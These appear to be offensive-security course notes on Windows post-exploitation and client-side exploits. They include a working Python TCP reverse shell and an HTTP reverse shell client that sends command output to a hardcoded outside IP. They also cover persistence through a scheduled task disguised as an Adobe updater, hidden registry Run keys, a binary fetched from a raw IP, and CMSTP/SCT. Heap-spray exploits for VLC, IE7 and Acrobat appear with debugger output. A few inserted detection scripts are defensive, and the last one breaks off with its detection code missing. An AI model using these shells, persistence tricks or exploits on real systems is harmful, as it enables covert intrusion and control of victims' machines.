import socket # For Building TCP Connection


def connect ():

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("45.32.211.184", 8080))
    s.listen(1)
    conn, addr = s.accept()
    print '[+] We got a connection from:  ', addr


    while True:
        command = raw_input("Shell> ")

        if 'terminate' in command:
            conn.send('terminate')   # the client looks for this exact word
            conn.close()  # close the connection with host
            break

        else:
            conn.send(command)   # send command
            print conn.recv(1024)

def main ():
    connect()
main()

----------------------------------------------------------------------

- First run the server.py code from the Ubuntu machine. From the command line type:

---------------------------Type This-----------------------------------

python server.py

----------------------------------------------------------------------

- then check that port 8080 is open, and that we are listening on 8080:

---------------------------Type This-----------------------------------

netstat -antp | grep "8080"

----------------------------------------------------------------------

- Then on the victim (Windows) unit run the client.py code.


- The connection will be established, and you will get a shell on Ubuntu:

---------------------------Type This-----------------------------------

python server.py
[+] We got a connection from:   ('192.168.243.1', 56880)
Shell> arp -a

Shell> ipconfig

Shell> dir
----------------------------------------------------------------------


##########################################
# HTTP based reverse shell in Python 2.7 #
##########################################


- The easiest way to install Python modules and keep them up to date is with the Python package manager pip
- Download get-pip.py from https://bootstrap.pypa.io/get-pip.py on your Windows machine

Then run python get-pip.py from the command line. Once pip is installed you may use it to install packages.

- Install the requests package:
---------------------------Type This-----------------------------------

     python -m pip install requests

----------------------------------------------------------------------

- Copy and paste the code below into client_http.py on your Windows machine:

- In my case the server/Ubuntu IP is 45.32.211.184. You need to change the IP to your server address, in both files (client_http.py, server_HTTP.py)

---------------------------Paste This-----------------------------------
# Client

import requests
import subprocess
import time


while True:
    req = requests.get('http://45.32.211.184')
    command = req.text

    if 'terminate' in command:
        break

    else:
        CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
        post_response = requests.post(url='http://45.32.211.184', data=CMD.stdout.read() )
        post_response = requests.post(url='http://45.32.211.184', data=CMD.stderr.read() )

    time.sleep(3)



----------------------------------------------------------------------


- Copy and paste the code below into server_HTTP.py on your Ubuntu unit (server):


---------------------------Paste This-----------------------------------

import BaseHTTPServer
HOST_NAME = '45.32.211.184'
PORT_NUMBER = 80
class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):

    def do_GET(s):
        command = raw_input("Shell> ")
        s.send_response(200)
        s.send_header("Content-type", "text/html")
        s.end_headers()
        s.wfile.write(command)


    def do_POST(s):
        s.send_response(200)
        s.end_headers()
        length = int(s.headers['Content-Length'])
        postVar = s.rfile.read(length)
        print postVar

if __name__ == '__main__':
    server_class = BaseHTTPServer.HTTPServer
    httpd = server_class((HOST_NAME, PORT_NUMBER), MyHandler)

    try:
        httpd.serve_forever()
    except KeyboardInterrupt:
        print '[!] Server is terminated'
        httpd.server_close()

----------------------------------------------------------------------

- run server_HTTP.py on Ubuntu with the following command:

---------------------------Type This-----------------------------------

sudo python server_HTTP.py

----------------------------------------------------------------------


- on the Windows machine run client_http.py

- on Ubuntu you will see that the connection is established:

---------------------------Type This-----------------------------------

sudo python server_HTTP.py
Shell> dir
-----------------------------------------------------------------------



###############################
# Device Guard Check & Bypass #
###############################
https://github.com/SadProcessor/SomeStuff/blob/master/Invoke-OSiRis.ps1


######################
# EDR Check & Bypass #
######################
https://github.com/SadProcessor/SomeStuff/blob/master/Invoke-EDRCheck.ps1



###############
# Persistence #
###############


---- Scheduled Task Based Persistence ----
1. Scheduled task based on the most commonly occurring event ID
https://github.com/TestingPens/MalwarePersistenceScripts/blob/master/user_event_persistence.ps1



To open a PowerShell command prompt either hit Windows Key + R and type in PowerShell or Start -> All Programs -> Accessories -> Windows PowerShell -> Windows PowerShell.

---------------------------Type This-----------------------------------
mkdir c:\persistance

cd c:\persistance

(new-object System.Net.WebClient).DownloadFile("https://github.com/TestingPens/MalwarePersistenceScripts/blob/master/user_event_persistence.ps1", "c:\persistance\user_event_persistence.ps1")

.\user_event_persistence.ps1
-------------------------------------------------------------------------



- Alternative method:
--------------------
In this case we will not be running PowerShell. We create a scheduled task definition file called "Adobe Flash Player Updater.xml"

- Copy and paste the code below into the "Adobe Flash Player Updater.xml" definition file on the target machine:
- adapt <UserId></UserId> to the SID of the current user if you do not have administrative privileges (wmic useraccount where name='user' get sid)
- adapt <Command>C:\Windows\System32\calc.exe</Command> to your reverse shell executable
- this scheduled task triggers on an event; it can be changed to regular calls (e.g. once an hour)

--------------------------------
<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Author>Adobe Systems Incorporated</Author>
    <Description>This task keeps your Adobe Flash Player installation up to date with the latest enhancements and security fixes. If this task is disabled or removed, Adobe Flash Player will be unable to automatically secure your machine with the latest security fixes.</Description>
  </RegistrationInfo>
  <Triggers>
    <EventTrigger>
      <Enabled>true</Enabled>
      <Subscription>&lt;QueryList&gt;&lt;Query Id="0" Path="Application"&gt;&lt;Select Path="Application"&gt;*[System[EventID=15]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>
    </EventTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author">
      <UserId>S-1-5-18</UserId>
      <RunLevel>LeastPrivilege</RunLevel>
    </Principal>
  </Principals>
  <Settings>
    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
    <AllowHardTerminate>true</AllowHardTerminate>
    <StartWhenAvailable>true</StartWhenAvailable>
    <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable>
    <IdleSettings>
      <StopOnIdleEnd>true</StopOnIdleEnd>
      <RestartOnIdle>false</RestartOnIdle>
    </IdleSettings>
    <AllowStartOnDemand>true</AllowStartOnDemand>
    <Enabled>true</Enabled>
    <Hidden>true</Hidden>
    <RunOnlyIfIdle>false</RunOnlyIfIdle>
    <WakeToRun>false</WakeToRun>
    <ExecutionTimeLimit>P3D</ExecutionTimeLimit>
    <Priority>7</Priority>
  </Settings>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Windows\System32\calc.exe</Command>
    </Exec>
  </Actions>
</Task>

---------------------------

Now let's create the scheduled task
---------------------------Type This-----------------------------------
schtasks /create /tn "Adobe Updater" /xml "Adobe Flash Player Updater.xml"
-----------------------------------------------------------------------


Sit back and wait for the task to trigger. By the way, we got the correct XML file format by creating a scheduled task and exporting it to an XML file. Then we were able to make some trivial changes to the file and import it.


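The things that make this task useful as persistence are also what a reviewer of exported task definitions can look for: `<Hidden>true</Hidden>`, an event-driven trigger instead of a schedule, a LocalSystem principal, and a vendor name in `<Author>` that has nothing to do with the executable being launched. As an added defender-side example (not part of the course notes or of the referenced scripts), the audit below parses a definition with the same shape as the one above and reports those traits. The vendor/command mismatch heuristic and the benign comparison task are assumptions constructed for this example; a real deployment would run it over `schtasks /query /xml` output or the files under `C:\Windows\System32\Tasks`.

```python
"""Audit a Task Scheduler XML definition for persistence red flags.

Added defender-side example, not part of the course notes. Parses a task
definition and reports hidden flag, event-driven triggers, LocalSystem
principal and author/command mismatch. Heuristics and the two sample
definitions are constructed for this example.
"""
import re
import xml.etree.ElementTree as ET

NS = "{http://schemas.microsoft.com/windows/2004/02/mit/task}"
LOCAL_SYSTEM_SID = "S-1-5-18"


def _text(node, path):
    """Stripped text of the first element at `path` under `node`, or ''."""
    found = node.find(path)
    return found.text.strip() if found is not None and found.text else ""


def audit_task_xml(xml_text):
    """Return a list of human-readable findings; an empty list means nothing was flagged."""
    root = ET.fromstring(xml_text)
    findings = []

    if _text(root, NS + "Settings/" + NS + "Hidden").lower() == "true":
        findings.append("task is hidden from the Task Scheduler UI")

    # Event-driven triggers fire on log activity rather than on a schedule.
    for trig in root.iter(NS + "EventTrigger"):
        sub = _text(trig, NS + "Subscription")     # XPath query, XML-escaped in the file
        m = re.search(r'Path="([^"]+)".*?EventID=(\d+)', sub)
        if m:
            findings.append("event-driven trigger on %s log EventID %s"
                            % (m.group(1), m.group(2)))
        else:
            findings.append("event-driven trigger with unparsed subscription")

    for principal in root.iter(NS + "Principal"):
        if _text(principal, NS + "UserId") == LOCAL_SYSTEM_SID:
            findings.append("runs as LocalSystem (S-1-5-18)")

    # Heuristic (assumption): the first word of the Author should appear in the command path.
    author = _text(root, NS + "RegistrationInfo/" + NS + "Author")
    for exe in root.iter(NS + "Exec"):
        cmd = _text(exe, NS + "Command")
        if author and author.split()[0].lower() not in cmd.lower():
            findings.append("author '%s' does not match command '%s'" % (author, cmd))
    return findings


# Constructed sample with the same shape as the definition above (description shortened).
SAMPLE_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Author>Adobe Systems Incorporated</Author>
    <Description>This task keeps your Adobe Flash Player installation up to date.</Description>
  </RegistrationInfo>
  <Triggers>
    <EventTrigger>
      <Enabled>true</Enabled>
      <Subscription>&lt;QueryList&gt;&lt;Query Id="0" Path="Application"&gt;&lt;Select Path="Application"&gt;*[System[EventID=15]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>
    </EventTrigger>
  </Triggers>
  <Principals><Principal id="Author"><UserId>S-1-5-18</UserId><RunLevel>LeastPrivilege</RunLevel></Principal></Principals>
  <Settings><Hidden>true</Hidden></Settings>
  <Actions Context="Author"><Exec><Command>C:\Windows\System32\calc.exe</Command></Exec></Actions>
</Task>"""

# Constructed benign comparison: scheduled, visible, ordinary user, vendor path matches author.
BENIGN_TASK = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><Author>Contoso</Author></RegistrationInfo>
  <Triggers><CalendarTrigger><StartBoundary>2024-01-01T03:00:00</StartBoundary></CalendarTrigger></Triggers>
  <Principals><Principal id="Author"><UserId>S-1-5-21-1111-2222-3333-1001</UserId></Principal></Principals>
  <Settings><Hidden>false</Hidden></Settings>
  <Actions Context="Author"><Exec><Command>C:\Program Files\Contoso\updater.exe</Command></Exec></Actions>
</Task>"""

if __name__ == "__main__":
    for name, xml_text in (("sample", SAMPLE_TASK), ("benign", BENIGN_TASK)):
        print(name, audit_task_xml(xml_text) or "no findings")
```

Real exports carry a UTF-16 XML declaration; hand `ET.fromstring` the raw bytes of the file rather than a decoded string so the declared encoding is honoured. Each finding on its own is legitimate in some tasks, so treat the count and the combination as the signal, not any single line.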
---- Registry Based Persistence ---
1. RunOnce key persistence trick
Reference:
https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/



1. upload your executable to the system
2. add the registry entry (requires admin privileges):
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001 /v "Line1" /d "||c:\path\to\malicious.exe"

Note:
The Beacon/shell may prevent the user from logging in, because the logon hangs in the Beacon executable. Solution: spawn a new Beacon and exit the initial Beacon.



2. GLOBALFLAGS IN IMAGE FILE EXECUTION OPTIONS
Let's try this:
https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/


2. Hide Reg
Let's try this code out:
https://gist.github.com/brianreitz/feb4e14bd45dd2e4394c225b17df5741

Reference:
https://posts.specterops.io/hiding-registry-keys-with-psreflect-b18ec5ac8353



Get the following two files
---------------------------
https://raw.githubusercontent.com/jaredcatkinson/PSReflect-Functions/master/PSReflect.ps1
https://gist.githubusercontent.com/brianreitz/feb4e14bd45dd2e4394c225b17df5741/raw/8f77b5e2f1952299f3a2dca0ef6c9266fe3e7b08/PSReflect-RegHide.ps1

In "PSReflect-RegHide.ps1" line 126, you can specify which command will be executed upon reboot (ex: 'cmd /c calc.exe'). It will be invisible to regedit and PowerShell.

To open a PowerShell command prompt either hit Windows Key + R and type in PowerShell or Start -> All Programs -> Accessories -> Windows PowerShell -> Windows PowerShell.

---------------------------Type This-----------------------------------
mkdir c:\persistance

cd c:\persistance

(new-object System.Net.WebClient).DownloadFile("https://raw.githubusercontent.com/jaredcatkinson/PSReflect-Functions/master/PSReflect.ps1", "c:\persistance\PSReflect.ps1")

(new-object System.Net.WebClient).DownloadFile("https://gist.githubusercontent.com/brianreitz/feb4e14bd45dd2e4394c225b17df5741/raw/8f77b5e2f1952299f3a2dca0ef6c9266fe3e7b08/PSReflect-RegHide.ps1", "c:\persistance\PSReflect-RegHide.ps1")

.\PSReflect-RegHide.ps1
-------------------------------------------------------------------------



Now, let's check whether the newly created registry value is hidden. You can do this by typing the following:
---------------------------Type This-----------------------------------
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
Get-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run
-----------------------------------------------------------------------
However, it will still be visible to, e.g., the Sysinternals Autoruns tool



3. VShadow
Let's try this out:
https://bohops.com/2018/02/10/vshadow-abusing-the-volume-shadow-service-for-evasion-persistence-and-active-directory-database-extraction/



1. Download vshadow.exe, included in the Windows SDK
    Windows 7: https://www.microsoft.com/en-us/download/details.aspx?id=8279
    Windows 10: https://developer.microsoft.com/en-us/windows/downloads/windows-10-sdk
2. Upload vshadow.exe to the target machine
3. Choose an arbitrary persistence mechanism to start vshadow.exe (e.g. Reg Key: reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v VSSBackup /t REG_EXPAND_SZ /d "C:\Temp\vshadow.exe -nw -exec=c:\windows\system32\notepad.exe c:")


---------------------------Type This-----------------------------------
mkdir c:\persistance

cd c:\persistance

(new-object System.Net.WebClient).DownloadFile("http://45.63.104.73/win10_vshadow_x64.exe", "c:\persistance\vshadow.exe")

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v VSSBackup /t REG_EXPAND_SZ /d "c:\persistance\vshadow.exe -nw -exec=c:\windows\system32\notepad.exe c:"
-----------------------------------------------------------------------


4. INF-SCT
Let's try this out:
https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/
https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/


Technique 1: CMSTP
------------------
create "c:\persistance\cmstp.inf" with the following content:
-----------------------------------
;cmstp.exe cmstp.inf

[version]
Signature=$chicago$
AdvancedINF=2.5

[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection

[UnRegisterOCXSection]
%11%\scrobj.dll,NI,c:\persistance\test.sct

[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="Yay"
ShortSvcName="Yay"
----------------------------------------------------



get a sample sct payload (e.g. https://gist.github.com/bohops/6ded40c4989c673f2e30b9a6c1985019) and store it in "c:\persistance\test.sct"


---------------------------Type This-----------------------------------
mkdir c:\persistance

cd c:\persistance

(new-object System.Net.WebClient).DownloadFile("https://gist.github.com/bohops/6ded40c4989c673f2e30b9a6c1985019", "c:\persistance\test.sct")

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v oemkey /t reg_sz /d "\"C:\Windows\System32\cmstp.exe\" /s C:\persistance\cmstp.inf"
-----------------------------------------------------------------------


reboot your machine
your sct payload will be executed upon reboot. HOWEVER, because a Windows binary executes it, the Sysinternals Autoruns tool will not show it unless you untick the "Options -> Hide Windows Entries" option


5. GPScript.exe
Let's try this out:
https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/



---- Cobalt Strike Aggressor Persistence Scripts ----
https://github.com/Und3rf10w/Aggressor-scripts/blob/master/kits/PersistKit/PersistKit.cna
https://github.com/harleyQu1nn/AggressorScripts/blob/master/Persistence/UserSchtasksPersist.cna
https://github.com/harleyQu1nn/AggressorScripts/blob/master/Persistence/ServiceEXEPersist.cna


--------------------------------------------------------------------------------------------------------------------------


####################
# Browser Exploits #
####################

VLC smb:// exploit
------------------

EXPLOIT VECTOR

smb://example.com@0.0.0.0/foo/#{AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA}
3234
3235
Exploit Scripts
3236
- ffvlc
3237
3238
ON YOUR HOST, RUN THE WEBSERVER ON PORT 8080
3239
3240
perl daemon.py vlc0.html
3241
3242
ON YOUR XPIE8 VM, START FIREFOX
3243
Browse to http://your_host_ip_address:8080/


vlc0.html
---------
<script>
   var buf = "";
   for(i = 0; i < 1250; i++)
      buf += unescape("%41%41%41%41");
   var track = "smb://example.com\@0.0.0.0/foo/#{" + buf + "}";
   document.write("<embed type='application/x-vlc-plugin' target='" + track + "' />");
</script>


vlc1.html
---------
<script>

   // shellcode created in heap memory
   var shellcode = unescape("%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc");

   // 800K block of NOPS
   var nop = unescape("%u9090%u9090");   // 4 NOPS (two UTF-16 units of 0x9090)
   while(nop.length < 0xc0000) {
      nop += nop;
   }

   // spray the heap with NOP+shellcode
   var memory = new Array();
   for(i = 0; i < 50; i++) {
      memory[i] = nop + shellcode;
   }

   // build the exploit payload
   var buf = "";
   for(i = 0; i < 1250; i++)
      buf += unescape("%41%41%41%41");
   var track = "smb://example.com\@0.0.0.0/foo/#{" + buf + "}";

   // trigger the exploit
   document.write("<embed type='application/x-vlc-plugin' target='" + track + "' />");
</script>


perl daemon.py vlc1.html

Search for where our NOPS+shellcode lies in the heap

s 0 l fffffff 90 90 90 90 cc cc cc cc

0:019> s 0 l fffffff 90 90 90 90 cc cc cc cc
03dffffc  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
040ffffc  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
043ffffc  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
046ffffc  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
049ffffc  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
04cffffc  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
04fffffc  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
052ffffc  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
055ffffc  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
058ffffc  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
05bffffc  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
05effffc  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
061ffffc  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
064ffffc  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
067ffffc  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................
06affffc  90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc  ................

Edit vlc2.html
replace %41%41%41%41 with %07%07%07%07


(928.fd0): Break instruction exception - code 80000003 (first chance)
eax=fffffd66 ebx=07070707 ecx=77c2c2e3 edx=00340000 esi=07070707 edi=07070707
eip=07100000 esp=0e7afc58 ebp=07070707 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000216
07100000 cc              int     3
0:019> u
07100000 cc              int     3
07100001 cc              int     3
07100002 cc              int     3
07100003 cc              int     3
07100004 cc              int     3
07100005 cc              int     3
07100006 cc              int     3
07100007 cc              int     3


Create vlc3.html (Copy vlc2.html to vlc3.html)
----------------------------------------------
Win32 Reverse Shell
- no restricted characters
- Encoder NONE
- use the JavaScript encoded payload generated by msfweb

USE AFTER FREE
--------------

struct {
   int a;
   int b;
   void (*add)();
   char c[20];          /* 20-byte buffer; the strcpy below writes more than 20 bytes into it */
} s1, s2;

s1.a = 3;
s1.b = 4;
s1.add = my_add_func;  /* store the function's address, not the result of calling it */
strcpy(s1.c, "AAAAAAAAAAAAAAAAAAAAAAAAAAAA");   /* overflows s1.c into whatever follows it in memory */
:
:
s2.add(x, y);          /* indirect call through a function pointer the overflow may have corrupted */
:

Exploit scripts
ie7-ms09002

perl daemon.py ie7imgtag0.html

First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=025445a0 ebx=00000000 ecx=4141ffff edx=00000002 esi=02545678 edi=80020003
eip=7e8999cb esp=01e8f68c ebp=01e8f694 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Internet Explorer Collection\IE700\mshtml.dll - 
mshtml!DllGetClassObject+0x4ec28:
7e8999cb ff5104          call    dword ptr [ecx+4]    ds:0023:41420003=????????

WHENEVER YOU HAVE A CRASH WHERE YOU FAULT ON:

call dword ptr [reg + N]

and you control the reg value (completely or partially),

you have an exploitable vtable overwrite.

u eip-3 <--- check 3 instructions before the crash
0:005> u eip-3
mshtml!DllGetClassObject+0x4ec25:
7e8999c8 8b08            mov     ecx,dword ptr [eax]
7e8999ca 50              push    eax
7e8999cb ff5104          call    dword ptr [ecx+4]

dd eax
0:005> dd eax
025445a0  4141ffff 00420042 00420042 00420042
025445b0  00420042 00420042 00420042 00420042
025445c0  00420042 00420042 00420042 00420042
025445d0  00420042 00000042 e8b9ce43 ff080100

%u4141%u4141BBBBBBBBBBBBBBBBBBBBBBBBB

<img src="%u4141%u4141BBBBBBBBBBBBBBBBBBBBBBBBB">
<img src="%u4141%u4141BBBBBBBBBBBBBBBBBBBBBBBBB">
<img src="%u4141%u4141BBBBBBBBBBBBBBBBBBBBBBBBB">
<img src="%u4141%u4141BBBBBBBBBBBBBBBBBBBBBBBBB">
<img src="%u4141%u4141BBBBBBBBBBBBBBBBBBBBBBBBB">
<img src="%u4141%u4141BBBBBBBBBBBBBBBBBBBBBBBBB">
<img src="%u4141%u4141BBBBBBBBBBBBBBBBBBBBBBBBB">
<img src="%u4141%u4141BBBBBBBBBBBBBBBBBBBBBBBBB">
<img src="%u4141%u4141BBBBBBBBBBBBBBBBBBBBBBBBB">
:
:

The EAX register ends up pointing to one of these src values:
%u4141%u4141BBBBBBBBBBBBBBBBBBBBBBBBB

EAX points to ---> 4141ffff B B B B B B ...
mov ecx, [eax]
- what will ecx be? ECX = 4141ffff
push eax
call dword ptr [ecx+4]
- EIP will jump to whatever is at memory location 4141ffff+4 = 41420003

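The rule above (a fault on `call dword ptr [reg+N]` with a register you control) can be checked mechanically from the WinDbg register dump. The Python crash-triage helper below is an added example, not part of the original notes: it parses the register line and the faulting instruction, computes the address that was dereferenced (here 4141ffff+4 = 41420003), and applies a heuristic for whether the register holds a fill pattern rather than a real pointer. The IE7 sample is copied from the dump above; the Acrobat sample is constructed from the edx=0c0c0c0c / `call [edx+4]` values in the PDF section of these notes, and the `looks_attacker_controlled` heuristic is my own assumption, not something the notes state.

```python
import re

# Sample copied from the IE7 crash dump earlier in these notes.
IE7_CRASH = """
eax=025445a0 ebx=00000000 ecx=4141ffff edx=00000002 esi=02545678 edi=80020003
eip=7e8999cb esp=01e8f68c ebp=01e8f694 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
7e8999cb ff5104          call    dword ptr [ecx+4]    ds:0023:41420003=????????
"""

# Constructed sample for the Acrobat case in the PDF section (edx=0c0c0c0c, call [edx+4]).
PDF_CRASH = """
eax=02e2d680 ebx=23826917 ecx=02e2d680 edx=0c0c0c0c esi=02c07674 edi=02c07674
eip=2d843114 esp=0013fb38 ebp=0013fbb8 iopl=0         nv up ei pl nz na po nc
2d843114 ff5204          call    dword ptr [edx+4]
"""

REG_RE = re.compile(r"\b(eax|ebx|ecx|edx|esi|edi|ebp|esp|eip)=([0-9a-f]{8})")
# `call/jmp dword ptr [reg]`, `[reg+N]` or `[reg-N]`; WinDbg prints larger N as hex with an 'h' suffix
INDIRECT_RE = re.compile(
    r"\b(call|jmp)\s+dword ptr \[(eax|ebx|ecx|edx|esi|edi|ebp|esp)"
    r"(?:\s*([+-])\s*(?:0x)?([0-9a-f]+)h?)?\]", re.I)


def parse_registers(text):
    """Map register name -> value from WinDbg's register dump lines."""
    return {name: int(val, 16) for name, val in REG_RE.findall(text)}


def indirect_call_target(text):
    """For a faulting `call/jmp dword ptr [reg+N]`, return (reg, address that was dereferenced)."""
    m = INDIRECT_RE.search(text)
    if not m:
        return None
    regs = parse_registers(text)
    reg = m.group(2).lower()
    disp = int(m.group(4), 16) if m.group(4) else 0
    if m.group(3) == "-":
        disp = -disp
    return reg, (regs[reg] + disp) & 0xFFFFFFFF


def looks_attacker_controlled(value):
    """Heuristic (my assumption, not from the notes): a pointer made of one repeated byte
    (41414141, 0c0c0c0c) or whose top two bytes are the same printable byte (4141ffff) is far
    more likely to be a fill pattern from the input than a real object address."""
    if value in (0, 0xFFFFFFFF):          # NULL and -1 are ordinary error values, not fill
        return False
    b = value.to_bytes(4, "big")
    if len(set(b)) == 1:
        return True
    return b[0] == b[1] and 0x20 <= b[0] < 0x7F


def triage(text):
    """Summarise a crash: which register was dereferenced, where, and whether it looks controlled."""
    hit = indirect_call_target(text)
    if hit is None:
        return {"indirect_call": False}
    reg, target = hit
    value = parse_registers(text)[reg]
    return {"indirect_call": True, "register": reg, "register_value": value,
            "dereferenced": target, "controlled_pointer": looks_attacker_controlled(value)}


if __name__ == "__main__":
    for label, dump in (("IE7", IE7_CRASH), ("PDF", PDF_CRASH)):
        t = triage(dump)
        print(f"{label}: [{t['register']}+N] -> {t['dereferenced']:08x} "
              f"(reg={t['register_value']:08x}, controlled={t['controlled_pointer']})")
```

A "controlled" verdict here is only the first filter: it tells the analyst which crashes in a fuzzing queue deserve the manual `u eip-3` / `dd reg` walk that the notes do by hand.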
ie7imgtag1.html
---------------

var buf = unescape("%u0606%u0606BBBBBBBBBBBBBBBBBBBBBBBBB");

EAX points to ---> 0606ffff B B B B B B ...
mov ecx, [eax]
- ecx = 0606ffff

call [ecx+4]
- call [06070003]

Do we control the memory at 06070003?

dd 04040404 ........ 90 90 90 90 90 90 90
dd 05050505 ........ 90 90 90 90 90 90 90
dd 06060606 ........ 90 90 90 90 90 90 90

   06070003 --> 90909090

dd 07070707 ........ 90 90 90 90 90 90 90

EIP = 90909090 (whatever is stored at location 06070003)





################
# PDF EXPLOITS #
################

mnp0.pdf

- Open up Acrobat Reader
- WinDBG
- F6 attach to AcroRd32.exe
- g to Go

EIP = 41414141

Next step is to spray the heap with NOPS+shellcode, and then land EIP in the heap.

mnp1.pdf

All we are doing is changing EIP to 0c0c0c0c.
There is no heap spray in this one.

This exception may be expected and handled.
eax=02e2d638 ebx=23826917 ecx=02e2d638 edx=02e2f868 esi=02c07674 edi=02c07674
eip=0c0c0c0c esp=0013fb38 ebp=0013fbb8 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
0c0c0c0c ??              ???

We know we get EIP control

mnp2.pdf

Put in the heap spray.

   var shellcode = unescape("%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc");

   var nops = unescape("%u9090%u9090");

   while(nops.length <= 32768)
      nops += nops;
   nops = nops.substring(0,32768 - shellcode.length);

   memory = new Array();

   for(i = 0; i < 1500; i++) {
      memory[i] = nops + shellcode;
   }

1500 NOP+shellcode blocks of 32K NOPs each

We would have sprayed over address 0c0c0c0c, and we hope to hit EIP = 0c0c0c0c, and get INT3.

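Both sprays on this page (vlc1.html in the browser section and mnp2.pdf here) have the same three-part shape: a `%u`-encoded sled (`%u9090`, `%ucccc`), a doubling loop on `.length`, and a loop that fills an array with sled+shellcode. The Python below is an added detection example, not part of the original notes, that pulls those three indicators out of script text and estimates how much memory the spray reserves. The two spray samples are copied from this page; the benign script and the size thresholds are my own assumptions.

```python
import re

# Sample copied from the vlc1.html spray in the browser section of these notes.
SPRAY_VLC = """
<script>
   var shellcode = unescape("%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc");
   var nop = unescape("%u9090%u9090");
   while(nop.length < 0xc0000) {
      nop += nop;
   }
   var memory = new Array();
   for(i = 0; i < 50; i++) {
      memory[i] = nop + shellcode;
   }
   var buf = "";
   for(i = 0; i < 1250; i++)
      buf += unescape("%41%41%41%41");
</script>
"""

# Sample copied from the mnp2.pdf spray above.
SPRAY_PDF = """
   var shellcode = unescape("%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc");
   var nops = unescape("%u9090%u9090");
   while(nops.length <= 32768)
      nops += nops;
   nops = nops.substring(0,32768 - shellcode.length);
   memory = new Array();
   for(i = 0; i < 1500; i++) {
      memory[i] = nops + shellcode;
   }
"""

# Constructed benign script that also fills an array in a loop.
BENIGN = """
var items = new Array();
for(i = 0; i < 50; i++) {
   items[i] = "row" + i;
}
document.write(items.join(","));
"""

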